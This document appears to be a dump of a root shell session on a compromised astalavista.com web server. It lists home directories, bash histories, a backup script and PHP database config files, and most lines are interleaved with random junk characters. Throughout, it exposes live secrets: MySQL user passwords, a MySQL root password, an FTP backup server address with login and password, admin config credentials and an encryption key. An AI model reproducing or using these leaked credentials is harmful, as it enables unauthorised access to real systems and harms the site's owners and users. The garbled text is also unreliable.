/ r, `' H7 h2 q; P% r, _#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #+ v3 ?5 h( ~- ?/ y4 Q ^
# |__| [__ | |__| | |__| | | | [__ | |__| #: ]: R- ], a" v* s' p6 A& h6 Y; K
# | | ___] | | | |___ | | \/ | ___] | | | #7 R5 }2 x8 D. q% L, A
# #& ]' h q1 T2 U1 A" b) p. P
#####################################################
6 |5 l8 }+ q6 C3 A" _ a# #6 {: V9 J5 ?% b) g5 b
# Admin Contact - 链接标记support@secureservertech.com #
5 Q. j* j. ]9 ?* i+ f# #: N7 N6 p: Z( [) H
# Available ShortCuts #
# e6 D t- y5 h! Y' S# `, O' L# #
6 g$ e q1 q# [7 n' h/ Q# nst - list active connections #% n( m Q: k( L) y* D
# ddos - shows how many times each ip is connected #
* a2 [5 Z* d6 k5 q" F# ltr - restart the webserver #
! t+ X, C5 W( i4 Y, w# q# phpc - edit the php config file #* J. W0 S9 t5 Y- L Y# f
# htc - edit the webserver configuration file # u9 }% ^# s p8 Z( |2 y* S1 S
# up - uptime #
6 X, t# q, s+ _3 E2 t+ ^% R# etd - edit the motd of the day file #6 X/ r2 r, L: O' n& a+ {, y
# htr - start and restart apache if needed #; J" T, Z8 W$ r+ n3 s
# syng - shows active SYN_RECV connections #
. P4 R: L! U$ L9 L: e9 M7 x+ Y) M# synd - syn flood blocker - “synd -h” for usage #8 p! ^" C) n( ]! z
#####################################################( [& ^$ u6 j* o
# NOTES: #
$ l$ U5 K8 W* P X2 m# Last Upgrade - 12-08-2008 by JF #! k' U8 {4 ?5 Z! l8 t9 ^
# My.cnf/Mysql Optimization - 1-28-09 #3 E/ ^( O( S: H9 l
# #8 t7 U9 V- t; O
# #
, N1 G* M- L) k# #) M8 a' I2 x- k9 V7 s, q- B
#####################################################
5 L# C# [ |+ H* H! @0 o/ Z1 A; G* s9 G, x# b) P
sh-3.2# lastlog | grep -v Never
7 U( ?' ^1 j) S N7 J! W' ?3 ^Username Port From Latest
5 r, A( I" B$ M$ i+ Nroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
, n" W! M. l4 v, L( c; G6 Xadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 20084 ?1 V0 \1 c2 V
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 20094 x. j5 E0 s+ R0 u( u2 k% x
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
6 c6 u+ ?2 W, x) J- ?, C G
; e# Z- P, b! vsh-3.2# ls -la
) A; n" t; @ O8 F$ y: n* stotal 4533769 L6 r' g/ x2 V, J2 d
drwxr-x— 15 root root 4096 Jun 4 08:40 .
: C M, @ X% s7 d/ Y* S! Zdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..* \3 o4 ?; Y+ ^0 H: Z% c7 d1 J
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip) b' R$ P; D) s7 z' j9 V) Z+ V
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg* U5 R* b! \( \' L
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history! i+ g2 Z8 o2 v$ f5 p( N3 s. [
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
. t( ~: I# b8 L7 c; ]9 y* } L9 S% \-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
7 } O" a5 O. U# D- f, J! i-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
' G& G1 R, m9 Q$ f-rwx—— 1 root root 1899 Oct 28 2007 bk.sh }# ?6 N) ^* G, K) p9 W. ^( Q
-rw-r–r– 1 root root 1327 Nov 29 2007 cert# ?. y# W' T4 S5 b3 [
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
& b1 q- ^0 J! H# ]2 T) Y' v* X9 M2 sdrwxr-xr-x 4 root root 4096 May 20 2008 .cpan7 O6 s9 K5 Z V4 Z2 w$ U, ^
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
8 E" V! ~1 E6 v-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
) |0 e3 l/ W+ tdrwx—— 2 root root 4096 Oct 28 2007 .elinks
. U2 l: J# @$ Fdrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1/ P( d% k" g2 j% j4 o
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2$ G" G, p5 L& E5 `% m5 k) z4 l; C
-rw——- 1 root root 0 Apr 16 13:19 .history- p; O7 N2 d0 p# c4 g
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
+ b! Y& v# A' {; z8 h% P! ]( y5 g3 n: j-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog# |/ }# S$ n9 ]/ ^
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
6 ~* [" T/ `1 v$ R; A-rw——- 1 root root 35 Jun 2 14:23 .lesshst
! ^( n' {0 r- I2 j9 N" Sdrwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
! f4 R* n/ _7 |, c, Qdrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec1 k* y, k H# f7 y, _- Z
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz; ]7 k5 H- {7 t/ S+ C3 b4 B: F
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2" l) G( c, s, D% s
-rwx—— 1 root root 760 Sep 18 2008 lp# z2 a% s1 h' h0 j' g
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.11 W! { S9 z2 ~1 t; ]1 ]
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz! {* D3 n! N& D4 A& A4 H3 }* t" {4 _
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1: `3 h- D, B& e9 W3 R, C
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
9 A8 l% J6 r# f' K6 t9 y$ I2 u-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz+ d5 E8 K9 ~0 Y; }. {3 p
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
$ g+ \% h* e: W$ R. }3 k |-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
" b8 l* \' N+ y! O1 Z( v5 i-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
/ z) j3 _6 w7 ^$ \! D-rw——- 1 root root 41 Oct 19 2007 .my.cnf3 I" r4 K, F/ Q
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
+ Q5 k1 p; A+ f1 J) M) S" J-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
' ]2 c( Z5 b1 n; `8 V3 ^-rw——- 1 root root 41 May 20 2008 .mytop
1 q! k! R p1 O/ `drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
5 q _ e1 q7 |9 }- H-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz% G! |- w2 f+ a+ E6 e: u' x# J9 i
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
, w* u r0 ~0 n3 O7 ~: X-rw——- 1 root root 1462 Sep 21 2007 opt.php
. _0 O* H! t, y5 ^-rw-r–r– 1 root root 3371 Sep 22 2007 p$ ?- H/ M h$ v# }
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz27 t; l, n; m* {. o+ ^# t b3 \
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
! O" [6 G& `" r7 n3 m# r o! T-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
+ P+ K! I8 R# `6 r4 ~0 r+ m# \-rw-r–r– 1 root root 887 Nov 28 2007 server.key
7 K4 p* k# l6 w* b( z. z3 w6 Ddrwx—— 2 root root 4096 Oct 10 2008 .ssh2 \8 l4 P" m$ v
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat" T) O1 W ?2 ]3 [% J
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc$ z; `2 b+ a, |# i
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip, ]* w2 j: W" |7 Q
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
7 C$ k/ f. F( _) K5 i/ E4 C6 Ddrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp v3 Z k' E* N0 ]; j, K* o& I
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh! Q; O4 ?& C+ F! d4 s2 J0 F- J
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
6 A6 f0 N8 t/ T: M-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
( y9 u0 Z9 r l# \# W" g: ^. R7 h-rw——- 1 root root 12997 May 16 2008 .viminfo
" _/ e! y% f: _9 d) ?( A. l& p! b) s0 b! C% p; v. f" m6 T
sh-3.2# cat .bash_history
* k" S; E) F2 w8 i. I$ j[snip]" Q/ a1 i, h, _1 ?! L
wget cp4sst.com/sstlinux.tar.gz
& n" J! i4 O2 I# btar zxvf sstlinux.tar.gz9 p5 {0 ~. {9 J. C5 t% ^( N# }
cd linux-2.6.27.10; E, L8 g, e8 L# Y3 H$ R% C, f, B
sh install.sh7 B7 }1 l7 Q0 V1 {( e* t* D4 ]) u
make bzImage ; make modules ; make modules_install ; make install3 {1 V* Q) ~& T# F" t% k
make clean; S) O! i- h/ m, k
service mysqld restart& e; J1 |) M: Y) T" E9 c- T* B( t% C
[snip]5 D0 U3 \" B3 V+ f i
cd /usr/sbin/( N& C7 w e3 r4 h1 {" M" }
chmod 4777 traceroute
{, H$ J1 g/ \, N" f4 Schmod 4777 ping3 U, p* Q, l5 S% b
traceroute -I 链接标记[url]www.astalavista.ch[/url]0 m' b1 A2 D0 z" c, _! H/ Q- X& i! T
[snip]
& P3 P9 x8 t2 }, nvi /etc/csf/csf.conf
. g# p, w: h2 }) M) gtraceroute google.ch
. j" m9 {6 H0 Y' t bservice csf restart
0 T$ X, g6 r L4 _% ~ {4 n6 itracert google.ch
' F* W1 ^( T5 i( |+ q3 H' o, Fservice csf restart/ I0 i$ j: ~" Q/ ^: x& ~+ Z
traceroute 链接标记[url]www.google.ch[/url]! ^ @" G4 H1 d2 c: v
tracert 链接标记[url]www.google.ch[/url]
5 j3 k2 V. P. M2 Y. T' n$ b; Otraceroute 链接标记[url]www.google.ch[/url]
- M+ S( r; U0 {8 [& i* _ @locate traceroute
& D' l: I% S+ Schown 4755 /bin/traceroute
S' Z' B$ B6 W6 Q6 _ H7 b0 Schown 4777 /bin/traceroute* |3 `" d7 l# m0 c5 h
locate ping
$ H/ K- L5 I9 h8 z1 `3 Kchown 4755 /bin/ping& }* c+ i$ ^+ M8 S5 |) Z; d- e
chown 4777 /bin/ping
% O8 |8 F$ d5 s) z! ]+ ~( ^cd /bin/
: u% p l: q L, C, }; S" T/ r, ?4 Nls -ali | grep ping
, s7 t4 J" M# u! cchown root ping
9 v- M' D0 V# ]% g5 F! m+ nchmod 4755 ping; a3 t: ]8 A1 N2 a: g, Q$ X* U' a
ls -ali | grep traceroute6 q5 Y$ K2 A, l- B; ^9 p2 _
chown root traceroute+ ~8 i& @+ N7 f) e5 \
chmod 4755 traceroute
0 ]) C% B! M& R3 dls -ali | grep traceroute
# \- K5 ^: ?7 q5 @9 K! c2 T4 ptraceroute -I 链接标记[url]www.google.ch[/url]
1 u/ k" @3 b( B& T; O( atraceroute 链接标记[url]www.google.ch[/url]& n8 G: O0 I/ X4 n4 f- }$ x' `
whois pmsantos.ch- m" _/ k/ C% x
[snip]* y8 C+ Q- e- s- I" A
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
) s5 q' x5 }' L. Q2 v6 c2 p7 Umysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql6 n: l- E% h1 T% l& s
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
5 ]( W# z4 F1 Q4 m% p: }0 Vmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
' j0 P- {: P" E$ ?) Vtop5 i5 I3 y! b3 p4 H" P
ping ssth.ch
! O8 k8 Z H( z# K( f5 eping asdlkfaljgasd???ljg???lasj.ch* O r' @% f2 l& T6 Z2 ]- i
ping asdlkfaljgasdlasj.ch& |5 T- O! S! y
ping 链接标记[url]www.ssth.ch[/url]
) Y/ z! y; {$ T# c: K, B) ^* sping ssth.ch2 Z9 _* g6 E" [
nslookup 链接标记[url]www.google.ch[/url]
1 u( u0 k+ s- n& F! ^nslookup 链接标记[url]www.ssth.ch[/url]( c. l" j' }/ t
man nslookup
% P* p# X& T$ ~! N6 X9 Zping 链接标记[url]www.google.ch[/url]& y( m/ L q; I3 R6 p* f
nslookup 链接标记[url]www.google.ch[/url]' X0 T3 K- d* h& s3 [! }2 M# w9 j( m
nslookup 链接标记[url]www.google.ch[/url]
/ B% o$ E! K8 q2 {4 M' U3 H+ fnslookup salfjasdlf.ch
3 F, R+ o1 W# ` a6 T' O/ x[snip]
- P+ C1 g6 j! k! | E: _, zopenssl passwd -1 sadf+ E9 h- @: |7 y, l, w
openssl passwd -1 5cZNHstdTy
! p8 _! S' @4 _" ^) f+ ~, Vmysql
$ I1 H9 K& S2 f8 j+ Hmysql$ ^2 l* W4 q; S5 L! }' ]
locate proftp
/ C u4 }7 s8 j* ~1 Dvi /etc/proftpd.passwd8 z U& f4 T: Z% W( H, |( Z
service proftpd restart$ ~2 o: s4 h6 B p5 }8 X2 T
locate proftpd.conf; n' J3 l( w4 y2 Y+ M
vi /etc/proftpd.conf7 |: p |, ]5 ~
vi /etc/proftpd.passwd7 U- ^/ v- t( a) l
service proftpd restart; o8 w1 l# Y8 i. p) v
[snip]
8 C! R6 L% M- B, J- Z4 p# ]/bin/sh /home/com/backup_system/backup.sh: ~3 F5 Y4 @ W; y( P1 t: q$ b Q7 t
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin, p$ Y/ y7 p) ?- x; t# f
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql4 u+ Y8 ~8 a$ `( O$ ^+ h0 W
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
3 X8 H* @# D) u: M5 d- _ls -ali
7 a1 y% ?' F; [1 T" dmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql& S6 T0 J2 G) o9 z$ X( C1 f
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql+ ]- F8 y) C$ j, @- V8 G
crontab -l
; `4 Z7 ^3 ?5 Z+ Ccrontab -l
; j7 ~8 A8 {$ a* j1 N6 z3 H8 Nphp -q /home/com/public_html/modifications/cronjobs/securitynews.php: t f. Z( k T5 z! `
/home/com/public_html/modifications/cronjobs/exploits.sh- M8 D3 V, A4 X0 ^! s
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]/ e* R4 w1 l4 j* D1 T- l, H
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
4 h( c! Q" N5 Y; P7 Jcd lsws-4.0.3' g1 ?6 i* l9 }/ U: q ?
sh install.sh
R& ]# r1 L- B' o, ~! nuptime
, L' b" X# J- ]* d0 h! yhdparm -tt /dev/sda+ U1 w* f# k* |+ P
iostat
2 d {5 D- ?7 K) Myum install iostat9 D7 Y8 Q' I" b/ R# S% N0 N& {
iostat2 d" l6 t1 q% m/ x% _; b
whereis iostat/ B/ t" B% Y: f4 f% ]8 P
yjm clean all
2 p& [! y: f b9 d( q' U2 B c5 Eyum clean all ; yum -y update
1 G- K# r# b* B O& Niostat( ] r. x# Q0 x1 B2 }" @+ |$ f
yum install systat9 p! E" @1 g: B1 z4 F1 O; W7 u. C
rpm -qa | grep iostat
5 L; p& t: u6 d* F2 z1 E5 K' arpm -qa | grep sysstat
) r7 w" X( F3 p! S0 Qrpm -qa | grep systat. F* [5 v8 _5 Z" w
dmesg -c
% P. h) G k+ I& J0 Xsysctl -p
+ C W, R/ Q) V4 c% ~$ Muname -r- r9 E& G4 S" P: Y' R5 c) t
cd /usr/src
1 b c- f: k! }wget nix101.com/kernels/sstlinux.tar.gz
2 e, K, d) @$ V% H; xshutdown -r now
% m1 c6 f' c5 |. {4 \/ D& e6 snano -w /boot/grub/grub.conf
. A/ K! d" \/ B& g# a: X2 U; s, ^/ S8 P Y
sh-3.2# cat .my.cnf* T- N, k N5 |
[client]
5 t( c3 Q- M+ C* Quser=da_admin
( N; t/ b/ o6 @) T# |# C/ bpassword=X9dctmRH
7 O* q* C. h8 |
7 j" C% G- b+ A# ^" c+ y( b1 tsh-3.2# cat /home/com/backup_system/backup.sh
1 e: ]& N! o% Q! k' K+ m; V#!/bin/sh
, @1 A% p$ u" B7 I#####################################################################
8 Z, Q* Q# M0 I6 g0 Q T# #" ^! `5 _+ p1 W" v. E' u
# incremental backup for astalavista.com #
; v; q: q" l8 d& T% ]3 Q5 k; @# #
. K* o3 t, i, I% Z( D" U( b* ^# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
+ I/ a0 W" r8 @. X8 s# C( X/ F# #
9 ?( y3 \ y6 N+ b% `: g- R#####################################################################
! i3 ?* h r( Z2 Z[snip]0 H& a0 j, N* W" y
PROG_DIR=”/home/com/backup_system”;4 b0 g$ P1 @$ \# T3 A! X' _/ @( B4 _
BACKUP_DIR=”/home/com/backups”;
" x& y- w4 z3 v2 D* eDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;+ P3 G- E2 x8 C7 _8 ~2 c
# ftp for synology backup server
6 \0 [$ W1 k) a3 K8 G& MFTP_HOST=”212.254.194.163″;# A0 W b6 i) W6 I
FTP_PORT=”21″;! L! I$ {' @/ r; f$ F7 j& ~ z! P
FTP_USER=”astalavista.com”;( m. V0 k8 S' p) z
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
4 U, E9 r! V: j8 Z" v6 y6 BFTP_DIR=”/astalavista.com”;
% i0 L" S3 S g/ A+ V# database( o# c* k$ B9 k: y. U
DB_HOST=”localhost”;2 s6 S4 L. X! L4 _: C! N
DB_USER=”contrexxuser2″;
! R) N7 p R" f# c9 m7 DDB_PASS=”0fEYNZgXz1pKe”;5 @* L1 O( C6 p% I9 O+ `
DB_DATABASE1=”com_contrexx2_live”; W8 K# @. `& L8 a
DB_DATABASE2=”com_contrexx2″;8 X" g2 q; Z Z) J$ O
[snip]
& k5 D% m3 q# L z/ D6 F! y& T8 fftp -in $FTP_HOST $FTP_PORT <<EOF
6 S; b9 V- O8 o0 cquote USER $FTP_USER
2 y& ~, ~! Y$ \" ~! i) F5 _1 @quote PASS $FTP_PASS3 j5 c- @* N( N
cd $FTP_DIR2 g% y, a) f9 U
put $DB_FULLNAME-SQL_Dump.tar" N! R! L8 `% K, \' ^; b
put $BACKUP_FULLNAME-Public_HTML.tar0 S7 U% H3 z3 O. x! G% p
close
/ D J# m& u7 E [bye; J7 U+ O8 O7 I1 P6 x$ I( R* C2 [
EOF3 X: ^9 v2 k9 x* j5 B
6 Z |) x$ z# i3 V+ z" m3 ~
sh-3.2# cd /home
4 S" E- E% v& ^' D) ssh-3.2# ls -la6 m7 H; S4 s; G4 c
total 1207 ~+ v3 H+ f3 ~4 }( P# z: W
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
N" m' y# B$ hdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..& u: `' R) [/ F/ p
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin |( a6 R- L' c0 F
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
6 `* u4 G: c5 F" v% Y; d& p( g-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
$ O; q4 |3 y4 D' i7 Z7 Wdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
! m3 k' m8 s' A& P2 adrwxr-xr-x 2 root root 4096 Jul 29 2008 backup4 ^7 n8 m' k' G+ R
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
* E+ d B+ q: r0 I) x! t: Pdrwx–x–x 10 com com 4096 Apr 28 12:40 com' e9 N) I. n" H* X! ~1 G! J6 ]
drwxr-xr-x 2 root root 4096 May 17 2007 ftp/ ^. {) {6 W2 F
drwx—— 3 jon jon 4096 Sep 21 2007 jon/ P m1 K# k) E" X' V
drwx—— 2 root root 16384 Sep 11 2007 lost+found
2 r$ \0 t& R- adrwxr-xr-x 2 root root 4096 Sep 14 2007 my0 ~, g% i! K" z7 |% \
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
; ]0 S8 ~# H& U0 f) Q# {drwx—— 2 jon jon 4096 Sep 15 2007 test9 A7 X5 j3 d3 B% C
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
8 L' W8 x _8 B% O& c3 D) M8 `) B( K% n
sh-3.2# cd admin
5 l! A( p9 \% y2 E( z( R/ V5 lsh-3.2# ls -la
8 B$ { E% C' A2 F, u4 ^total 17358961 i# J# R/ f5 I$ T u5 P
drwx–x–x 9 admin admin 4096 Nov 28 2007 .
( Z- H: m, i ~) Edrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
f# U3 _2 U* x, zdrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
. S9 @, r1 b7 }9 a# u f: y4 S1 Bdrwx—— 2 admin admin 4096 Sep 28 2007 backups
- s7 ?1 T* w! f; C-rw——- 1 admin admin 860 Sep 17 2008 .bash_history7 R4 `" ` _1 K$ v" }
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout( B! |( ^1 n# I* Y
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
, @3 [. N) O( |, @-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc3 x" u# l; _" o
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups* q1 @- W, m5 @; o) ^/ }
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains$ V5 I( S. L* [( ]1 I! K
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap/ `+ L, B# l4 {
-rw-r–r– 1 root root 24 Sep 21 2007 info.php& _2 ^+ s0 T P: ]. g; q( U
drwx—— 2 admin admin 4096 Sep 21 2007 mail& b* X! g& w b
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr1 Y& p6 d9 _: r% ]* R$ z+ I
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
2 Y4 V J% z1 s) ~-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow4 L5 j/ q# N6 |) h
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz# `6 X k: e/ @: ~4 z0 }
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
0 |# b# T* ~ h9 |7 R6 N: c& [1 O0 W' ?) v3 e2 V/ C( I2 i# H
sh-3.2# ..
; [2 ~/ K# Z" W- j4 U9 L x# _sh-3.2# cd jon0 e: u1 ?1 {9 T9 G# q
sh-3.2# ls -la
$ H8 g' R0 S8 Qtotal 368 h% Z- G" \- S# g1 z' {
drwx—— 3 jon jon 4096 Sep 21 2007 .# ?( M4 `9 p) y5 Q* h3 ^3 M
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
, ]4 V5 z4 y8 |-rw——- 1 jon jon 53 Sep 21 2007 .bash_history5 p, G# f9 q& J/ e$ F
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout: h! t( |3 E5 E6 `+ o$ ]9 Y/ Q3 X- f
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile9 h6 s! }1 H' y5 W
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc4 G1 A9 }# | v, b' J
-rw-r–r– 1 root root 24 Sep 21 2007 info.php5 m2 d+ e% O$ e' L
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
4 z* v) `2 B* ~ M
3 ^4 \8 {8 |6 V- }8 u3 Dsh-3.2# cd ..6 K) \0 h- A- Q! T6 S, p" ?
sh-3.2# cd test
, h" C8 i1 M! l* G& ?sh-3.2# ls -la" k& y4 U9 n) j* E( m
total 48
; f* z9 d: E, E! Pdrwx—— 2 jon jon 4096 Sep 15 2007 .
# ~1 u0 }/ b6 T% v- Fdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .." E5 E* z* H: M7 c0 C
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history, I2 l' u, \2 V+ ]% k. z
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
S/ `0 v2 \6 B3 F-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile# p( X( _3 P: S& O
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc( A5 i2 m4 t* @5 x
sh-3.2# cat .bash_history
2 R" i! L6 K! \6 t1 e, Z/usr/bin/mysqladmin -u root password PoliuJhytg67: [. A& s; j7 J6 S+ o& Z) E
q% R0 r9 a. {8 i
sh-3.2# cd ..
, h% c4 W1 k5 l. W/ N7 u" q9 z! }sh-3.2# cd astanet G" U0 c) o) l- \% w2 X
sh-3.2# ls -la
1 `( ^9 P# e v+ l( ktotal 529 D/ v# }* S1 G) ^( i
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
: m7 x/ j6 P+ Z4 ~drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..+ F Z- m4 M8 h7 A7 c
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth, [6 H/ j. w- M b
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
; R+ Y* @: K7 E2 H3 J" l1 r-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
# Z: @, y* @7 _0 A9 E' y-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
+ q9 O4 N8 ?1 [: E-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
/ w3 y5 J9 R2 V# G- I, ?. wdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains' ]5 A6 R# f6 @/ [. u. T
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
9 \8 x1 w% ~1 P' @# g k: o& gdrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail9 J: k) r7 u! h- w, f
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
- ]7 y' g! S2 Q1 Tlrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html9 L c$ y0 M" X( D& ^1 A
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow( f6 @: B* S* c0 J" e
- P H: ], O4 H# {3 o, o; H9 e, `sh-3.2# cd auth/
! f; X* d" ?5 c$ K* `sh-3.2# ls -la- b( _" w) D( q3 P9 F
total 28
! X4 r0 v5 u$ l9 u, e& k: T Pdrwxr-xr-x 2 root root 4096 Dec 23 16:00 ., |" W0 R: V: C; J
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
' I4 A/ K3 }) Q6 h" D$ X# }-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
" o( e: Z: a- o# F; y-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
! s. c! m3 T; a, N/ c, N/ R( g( ^-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
: F9 {9 I7 o% f+ f-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
6 o1 p4 i8 O' U-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd4 h2 s! {# N" f- ]' N& h
( ^" p- Q1 m+ a3 K9 M$ G+ Z2 dsh-3.2# cat hackercontest.config.inc.php% w) L* A+ ? B) `# E: ^% Z, y
<?PHP2 `- J% S: L. _& W; I& O3 G3 O- D7 h
// Variabeln f?r Verbindung zur Datenbank //+ P; Y. V$ V1 v" w, x' ^
$conxHost = ‘localhost’; // MySQL hostname
: Z& T I. L" e F1 D7 e- X$conxUser = ‘hackercontest’; // MySQL user0 e" k( ~& {5 x/ r( q( r
$conxPassword = ‘K6m@7dUc’; // MySQL password$ Z) w5 p/ K( A$ T+ `2 i1 O% v
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
. @) D; H- h- K2 Q$ x?>" x! r) [8 b! I: X9 S/ D
sh-3.2# cat hosting.config.inc.php( y$ s( f# L5 T$ N
<?PHP
) O6 y) ?! a& P/ g// Variabeln f?r Verbindung zur Datenbank /// e- v0 l/ I3 v+ M; h
$conxHost = ‘localhost’; // MySQL hostname
% m/ d) Z& \3 p7 l+ M1 P1 i$conxUser = ‘hostinguser’; // MySQL user
2 Y) L: ]1 A$ E$conxPassword = ‘cXvB3981′; // MySQL password) o, c( ^$ B; n( Y
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
. w& `! s( ^, a+ a3 H y9 ^?>; q R4 R) f: K" h
! T6 [- S* X' Q
sh-3.2# cd ..; f- }+ }2 R/ G4 A; c
sh-3.2# cd com
% Y3 Y% `. Y- V0 D5 Jsh-3.2# ls -la
7 B" y# e' o9 F; K3 ]+ Ototal 141208
# U/ K3 B" Z% Z) x% w2 B) A1 I% ddrwx–x–x 10 com com 4096 Apr 28 12:40 .% _6 f; D/ P8 J) E! K- g
